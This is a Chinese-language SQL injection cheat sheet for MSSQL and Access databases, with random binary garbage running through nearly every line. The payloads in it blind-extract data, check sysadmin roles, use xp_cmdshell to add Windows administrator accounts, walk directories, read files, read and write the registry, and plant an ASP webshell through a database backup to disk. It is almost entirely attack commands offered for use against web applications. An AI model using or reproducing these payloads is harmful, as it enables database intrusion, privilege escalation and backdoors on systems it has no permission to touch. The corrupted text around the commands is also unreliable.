1.判断是否有注入;and 1=1 ;and 1=2 �7W��firRM
2.初步判断是否是mssql ;and user>0 ��1�qKxg�
#u5;utY:F�
3.注入参数是字符'and [查询条件] and ''=' %�802��H%+
>wk=`&+V�@
4.搜索时没过滤参数的'and [查询条件] and '%25'=' _�&��Uo|T�
}:�l%,D�Bw
5.判断数据库系统 �9g5�{�3N3
�_B7?C:8Q-
;and (select count(*) from sysobjects)>0 mssql `�{D�i��*�
0R��5^�p�
;and (select count(*) from msysobjects)>0 access B0�XBI0w^Y
b�,��
*�*$
0/00�W6�r0
`MYK�X��BM
6.猜数据库 ;and (select Count(*) from [数据库名])>0 ,iv%^�C",)
ah"Mz�U��)
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 q'AnI�$!�
�I;.!
hV>E
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 {9|�$%4kRl
y7I�b�E���
9.(1)猜字段的ascii值(access) z'�}���=�A
nh&J3b}B�!
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 K-D�k2(�x
�v6DxxE2n�
(2)猜字段的ascii值(mssql) # pj�yh�H@
��MV;Y?%>
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 �8&A|�)ur4
Rw
�ao5l=x
10.测试权限结构(mssql) W�/Z�ahPPq
�bR8
HGH28
)4F/T,�{;m
6v2�R��S��
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Yx}"��> ;\
��E
^SM��`
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ���uM��#U!
zr;�Y1Xt�4
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 6(��q`O��j
77&^$J��pM
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));--
E�agmafu
WP@JrnxO\`
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- E_![`9�i��
Z/�6�'kE{l
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- o S�:vTr+$
x+�*L5$;�h
;and 1=(select IS_MEMBER('db_owner'));-- &DbGyV8d"|
U3|&�Je��e
�9*TS9�0>a
*/5�<�L99v
11.添加mssql和系统的帐户 hDD~,/yVxs
DtJTnv�G~B
;exec master.dbo.sp_addlogin username;-- �&t*8oNwSs
;exec master.dbo.sp_password null,username,password;-- i�^s`6:rNu
THbtu�*E�l
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- \{M�rQ2jd
pT
ocqJ2�2
;exec master.dbo.xp_cmdshell 'net user username password L%�o�6��5
@^�:7�UI_�
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- 9O�Q0Yc�!3
~g
K-5�}%!
;exec master.dbo.xp_cmdshell 'net user username password /add';-- �T)�Zt'��M
p���'%: M�
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- kh>S�rW]B%
�.�cH{W�Z�
y[^k*,=
9
m_E[�bDO�N
12.(1)遍历目录 az�\<sWb�#
�rK��y-��u
;create table dirs(paths varchar(100), id int) i��>]<*�w
I4o���=6ts
;insert dirs exec master.dbo.xp_dirtree 'c:\' /��mMA��wx
�d��I�k8TJ
;and (select top 1 paths from dirs)>0 �!HdvCYB>
Re�kb?|{z
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>)
/.|���A��
c+Q.?v���J
m<�FW�v2)^
dK �J@�{d�
(2)遍历目录 ]e@0�T�{!
!���Ig|m+
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- k"q!|�+&Fs
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 nL":0!DTRD
QX/X �{h�6
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �AK��@`'�$
't0�+:o">:
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 Ss#�@=:"�P
|2
YubAIZ(
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 �`?z�g3GD_
�X�6Lh��M�
V9fGV�Dl�;
eq@am(#&kY
13.mssql中的存储过程 T}L^�C�U0�
=9qG�Ekd�3
xp_regenumvalues 注册表根键, 子键 "E�cX���_>
#g�W �/qJ
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 X$�7Oo^1�;
AfbB~Ll�Bq
xp_regread 根键,子键,键值名 T~i%j@�Q.6
���F`Dg*O
;exec xp_regread P�"(z jG9-
e/�"yG�Q�u
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 �d5@X#3Hd
(�O)\#%,@R
xp_regwrite 根键,子键, 值名, 值类型, 值 �K3�vse�or
\H� �Wcd�|
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 ,op]-CY�5�
GVmC �}�>z
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 �CS/Mpms�p
�]pW�86L%
xp_regdeletevalue 根键,子键,值名 �1�R�0ffP]
nNt*�} ��k
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 ?��PB�a�'g
���"�+=�Pp
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 vU=9�ydAj?
y�[:�
~�CL
aWyUu/g<A`
96(R'�^kNX
14.mssql的backup创建webshell 63W{U/*aao
K�(�<$�.��
use model �Fi� mN�?s
x^A7'ad��0
create table cmd(str image); s}6+8��fE"
!�Eq#[G��s
insert into cmd(str) values (''); '��.?�^uM�
�6c�J<9i
&
backup database model to disk='c:\l.asp'; "j�Mqt9ysN
V�c�lr)}�5
QE|`&~sme�
g>�so�
R&*
15.mssql内置函数 9���B
�/s
vxZg &SRK�
;and (select @@version)>0 获得Windows的版本号 93�j{�.0]X
R (��G2�qi
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Pg�M�b�MH
X0�`j-*,FX
;and (select user_name())>0 爆当前系统的连接用户 &�VDl/qnaL
8p&kL�o&��
;and (select db_name())>0 得到当前连接的数据库 z
�v>�Oh#�
�-."kq.m*�
?�WQN�IX�4
5�F2_xH$5
16.简洁的webshell �%SAw;ZtQ:
SxJ�$���b�
use model �lwc5�S�`"
T-'~?��[v�
create table cmd(str image); #��ly@;!M�
F$�Hx`�hoy
insert into cmd(str) values (''); En(7(�qP6}
�#uSK#>H_!
backup database model to disk='g:\wwwtest\l.asp';
